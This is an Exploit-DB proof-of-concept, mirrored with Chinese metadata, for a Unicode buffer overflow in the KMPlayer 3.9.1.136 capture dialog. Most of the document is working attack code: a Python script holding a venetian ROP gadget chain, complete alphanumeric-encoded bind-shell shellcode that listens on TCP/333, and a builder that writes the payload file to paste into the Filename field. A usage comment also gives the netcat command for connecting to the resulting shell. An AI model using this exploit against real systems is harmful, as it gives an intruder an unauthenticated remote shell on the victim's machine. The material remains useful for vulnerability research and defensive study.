KMPlayer 3.9.1.136 – Capture Unicode Buffer Overflow (ASLR Bypass)

  • 作者: Naser Farhadi
    日期: 2015-06-23
  • 类别:
    平台:
  • 来源: https://www.exploit-db.com/exploits/37344/
  • #!/usr/bin/python
    #
    # KMPlayer 3.9.1.136 Capture Unicode Buffer Overflow (ASLR Bypass)
    #
    # Author: Naser Farhadi
    #
    # Date: 21 June 2015
    # Version: 3.9.1.136
    # Tested on: Windows 7 SP1 (32 bit)
    #
    # Usage:
    # chmod +x KMPlayer.py
    # python KMPlayer.py
    # In KMPlayer: Alt+c (Video Capture) or Alt+a (Audio Capture), then
    #     paste the content of KMPlayer.txt into the Filename field.
    # From the attacker host: nc 172.20.10.14 333   (172.20.10.14 is the author's
    #     test victim; the windows/shell_bind_tcp stage listens on TCP/333 and
    #     accepts any connection, unauthenticated -- use only on an isolated lab network)
    #
    # Video: http://youtu.be/9gtZxR2ioTM
    ##
    
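    """KMPlayer 3.9.1.136 -- Capture dialog Unicode (UTF-16) buffer overflow, ASLR bypass.

    Produces KMPlayer.txt, whose content is pasted into the Filename field of the
    Video/Audio Capture dialog.  The field widens the pasted ASCII to UTF-16, so
    every payload byte lands in memory followed by a 0x00.  The preamble below is
    therefore written as "venetian" code (one useful opcode, then a byte that --
    together with the inserted 0x00s -- decodes to a harmless instruction), and
    the shellcode is encoded with x86/unicode_mixed so it survives the same
    transform.  Every byte of the payload must stay below 0x80: anything higher
    would be re-mapped by the code page on paste rather than widened 1:1.

    Security note: the shellcode is a windows/shell_bind_tcp stage.  On success
    the target listens on TCP/333 with no authentication; anyone who can reach
    that port gets a shell.  Run this only against hosts you own, on an
    isolated network.

    Changes from the original PoC: bytes literals and a ``with`` block so the
    script runs on Python 3 as well as 2 (``open(..., "wb").write(str)`` raises
    TypeError on 3 and leaked the handle on 2); the module-level ``buffer``
    name, which shadowed a Python 2 builtin, is gone; the 0x71 padding is now
    checked instead of silently collapsing to "" when the shellcode is longer
    than the slot; the write only happens under ``__main__``.
    """

    # Stack pivot plus gadget chain that leaves ESP pointing at the shellcode.
    # Every second byte is venetian padding: after UTF-16 widening it absorbs the
    # 0x00 into an ADD/INC that does nothing useful but keeps the instruction
    # stream aligned.  "\x33\x77" widens to 33 00 77 00 = 0x00770033, the
    # POP EBP / RETN gadget the author found in KMPlayer.exe -- presumably the
    # image loads at a fixed base, which is the "ASLR bypass"; verify the
    # address against the target build before use.
    ROP_PREAMBLE = (
        b"\x50"        # PUSH EAX
        b"\x40"        #   venetian padding => ADD BYTE PTR DS:[EAX],AL
        b"\x5c"        # POP ESP
        b"\x40"        #   venetian padding => ADD BYTE PTR DS:[EAX],AL
        b"\x61"        # POPAD
        b"\x45"        #   venetian padding => ADD BYTE PTR SS:[EBP],AL
        + b"\x5f\x45" * 125   # (POP EDI / venetian padding => ADD BYTE PTR SS:[EBP],AL) x125
        + b"\x54"      # PUSH ESP
        b"\x45"        #   venetian padding => ADD BYTE PTR SS:[EBP],AL
        b"\x45"        # padding => INC EBP
        b"\x45"        #   venetian padding => ADD BYTE PTR SS:[EBP],AL
        b"\x61"        # POPAD
        b"\x47"        #   venetian padding => ADD BYTE PTR DS:[EDI],AL
        b"\x33\x77"    # POP EBP / RETN gadget in KMPlayer.exe
        b"\x58"        # POP EAX
        b"\x47"        #   venetian padding => ADD BYTE PTR DS:[EDI],AL
        b"\x33\x77"    # POP EBP / RETN gadget in KMPlayer.exe
        b"\x58"        # POP EAX
        b"\x47"        #   venetian padding => ADD BYTE PTR DS:[EDI],AL
        b"\x33\x77"    # POP EBP / RETN gadget in KMPlayer.exe
        b"\x5d"        # POP EBP
        b"\x47"        #   venetian padding => ADD BYTE PTR DS:[EDI],AL
        b"\x71"        # padding => JNO SHORT 0x2
        b"\x71"        #   venetian padding => ADD BYTE PTR DS:[ECX],DH
    )

    # msfpayload windows/shell_bind_tcp LPORT=333 R | msfencode -e x86/unicode_mixed BufferRegister=ESP -t c
    # Alphanumeric output: that is what lets it survive the UTF-16 widening.
    SHELLCODE = (
        b"\x54\x47\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49"
        b"\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41"
        b"\x49\x41\x6a\x58\x41\x51\x41\x44\x41\x5a\x41\x42\x41\x52\x41"
        b"\x4c\x41\x59\x41\x49\x41\x51\x41\x49\x41\x51\x41\x49\x41\x68"
        b"\x41\x41\x41\x5a\x31\x41\x49\x41\x49\x41\x4a\x31\x31\x41\x49"
        b"\x41\x49\x41\x42\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49"
        b"\x41\x49\x51\x49\x31\x31\x31\x41\x49\x41\x4a\x51\x59\x41\x5a"
        b"\x42\x41\x42\x41\x42\x41\x42\x41\x42\x6b\x4d\x41\x47\x42\x39"
        b"\x75\x34\x4a\x42\x69\x6c\x39\x58\x31\x72\x79\x70\x4d\x30\x39"
        b"\x70\x53\x30\x75\x39\x67\x75\x4e\x51\x35\x70\x62\x44\x52\x6b"
        b"\x70\x50\x6e\x50\x52\x6b\x52\x32\x4c\x4c\x54\x4b\x72\x32\x4b"
        b"\x64\x42\x6b\x52\x52\x4d\x58\x5a\x6f\x38\x37\x6f\x5a\x6c\x66"
        b"\x4c\x71\x59\x6f\x36\x4c\x4d\x6c\x30\x61\x51\x6c\x4a\x62\x6c"
        b"\x6c\x6f\x30\x69\x31\x78\x4f\x4a\x6d\x59\x71\x77\x57\x67\x72"
        b"\x4b\x42\x70\x52\x6e\x77\x62\x6b\x6e\x72\x6a\x70\x32\x6b\x6e"
        b"\x6a\x6d\x6c\x74\x4b\x30\x4c\x5a\x71\x32\x58\x49\x53\x70\x48"
        b"\x6d\x31\x57\x61\x4e\x71\x44\x4b\x61\x49\x6d\x50\x6a\x61\x4a"
        b"\x33\x72\x6b\x71\x39\x6e\x38\x58\x63\x6d\x6a\x70\x49\x62\x6b"
        b"\x6c\x74\x74\x4b\x4d\x31\x58\x56\x4d\x61\x69\x6f\x54\x6c\x76"
        b"\x61\x78\x4f\x7a\x6d\x69\x71\x47\x57\x4f\x48\x57\x70\x43\x45"
        b"\x58\x76\x5a\x63\x61\x6d\x59\x68\x6f\x4b\x61\x6d\x6c\x64\x33"
        b"\x45\x57\x74\x30\x58\x54\x4b\x30\x58\x6d\x54\x69\x71\x37\x63"
        b"\x70\x66\x44\x4b\x4c\x4c\x70\x4b\x34\x4b\x6f\x68\x4d\x4c\x59"
        b"\x71\x68\x53\x64\x4b\x6c\x44\x44\x4b\x5a\x61\x78\x50\x73\x59"
        b"\x51\x34\x6c\x64\x6e\x44\x61\x4b\x4f\x6b\x43\x31\x4f\x69\x31"
        b"\x4a\x70\x51\x49\x6f\x49\x50\x71\x4f\x61\x4f\x70\x5a\x72\x6b"
        b"\x6c\x52\x48\x6b\x64\x4d\x51\x4d\x72\x48\x6c\x73\x70\x32\x49"
        b"\x70\x49\x70\x33\x38\x43\x47\x52\x53\x4d\x62\x71\x4f\x4e\x74"
        b"\x70\x68\x50\x4c\x44\x37\x6c\x66\x6c\x47\x39\x6f\x47\x65\x37"
        b"\x48\x42\x70\x6a\x61\x4d\x30\x39\x70\x4d\x59\x37\x54\x42\x34"
        b"\x30\x50\x33\x38\x4b\x79\x35\x30\x42\x4b\x59\x70\x4b\x4f\x46"
        b"\x75\x31\x5a\x39\x78\x30\x59\x30\x50\x37\x72\x39\x6d\x31\x30"
        b"\x42\x30\x4d\x70\x72\x30\x61\x58\x38\x6a\x4c\x4f\x57\x6f\x77"
        b"\x70\x79\x6f\x66\x75\x56\x37\x53\x38\x6b\x52\x39\x70\x79\x71"
        b"\x4e\x6d\x61\x79\x67\x76\x62\x4a\x4a\x70\x52\x36\x6e\x77\x51"
        b"\x58\x57\x52\x59\x4b\x70\x37\x62\x47\x49\x6f\x38\x55\x72\x37"
        b"\x42\x48\x74\x77\x69\x59\x4f\x48\x69\x6f\x69\x6f\x76\x75\x6f"
        b"\x67\x63\x38\x52\x54\x5a\x4c\x4f\x4b\x68\x61\x79\x6f\x68\x55"
        b"\x31\x47\x46\x37\x62\x48\x54\x35\x72\x4e\x6e\x6d\x50\x61\x69"
        b"\x6f\x77\x65\x63\x38\x62\x43\x62\x4d\x42\x44\x6d\x30\x75\x39"
        b"\x58\x63\x32\x37\x6e\x77\x50\x57\x50\x31\x6a\x56\x71\x5a\x6e"
        b"\x32\x32\x39\x51\x46\x59\x52\x49\x6d\x52\x46\x38\x47\x70\x44"
        b"\x4f\x34\x4f\x4c\x4d\x31\x6b\x51\x74\x4d\x6e\x64\x6f\x34\x6c"
        b"\x50\x76\x66\x6b\x50\x6e\x64\x51\x44\x32\x30\x50\x56\x71\x46"
        b"\x6e\x76\x4f\x56\x70\x56\x50\x4e\x62\x36\x6f\x66\x70\x53\x71"
        b"\x46\x51\x58\x54\x39\x46\x6c\x6d\x6f\x31\x76\x4b\x4f\x79\x45"
        b"\x34\x49\x59\x50\x50\x4e\x6f\x66\x50\x46\x4b\x4f\x30\x30\x63"
        b"\x38\x6c\x48\x54\x47\x6d\x4d\x33\x30\x39\x6f\x66\x75\x75\x6b"
        b"\x68\x70\x37\x45\x44\x62\x30\x56\x53\x38\x54\x66\x74\x55\x65"
        b"\x6d\x53\x6d\x4b\x4f\x79\x45\x6d\x6c\x59\x76\x43\x4c\x6a\x6a"
        b"\x35\x30\x4b\x4b\x59\x50\x70\x75\x6b\x55\x55\x6b\x30\x47\x7a"
        b"\x73\x33\x42\x50\x6f\x30\x6a\x59\x70\x32\x33\x6b\x4f\x79\x45"
        b"\x41\x41"
    )

    # Bytes available after the preamble.  The original PoC always emitted
    # exactly this many (shellcode + 0x71 filler); the total filename length
    # is presumably what the overflow depends on, so keep it fixed.
    PAYLOAD_SLOT = 1534


    def build_payload(shellcode=SHELLCODE, slot=PAYLOAD_SLOT):
        """Return ROP_PREAMBLE + shellcode, padded with 0x71 to exactly ``slot`` bytes.

        shellcode -- 7-bit-clean bytes to place behind the preamble.
        slot      -- number of bytes the shellcode + filler must occupy.

        Raises ValueError when the shellcode does not fit in ``slot`` (the
        original ``"\\x71" * (1534 - len(shellcode))`` silently produced an
        empty string in that case, shifting the whole layout) or when it
        contains a byte >= 0x80, which would not be widened 1:1 by the dialog.
        """
        if len(shellcode) > slot:
            raise ValueError(
                "shellcode is %d bytes but the slot holds %d" % (len(shellcode), slot))
        # bytearray() yields ints on both Python 2 and 3.
        if any(b >= 0x80 for b in bytearray(shellcode)):
            raise ValueError(
                "shellcode must be 7-bit ASCII to survive the Unicode (venetian) transform")
        filler = b"\x71" * (slot - len(shellcode))
        return ROP_PREAMBLE + shellcode + filler


    def main(out_path="KMPlayer.txt"):
        """Write the payload to ``out_path`` in binary mode (no newline translation)."""
        payload = build_payload()
        with open(out_path, "wb") as fh:
            fh.write(payload)


    if __name__ == "__main__":
        main()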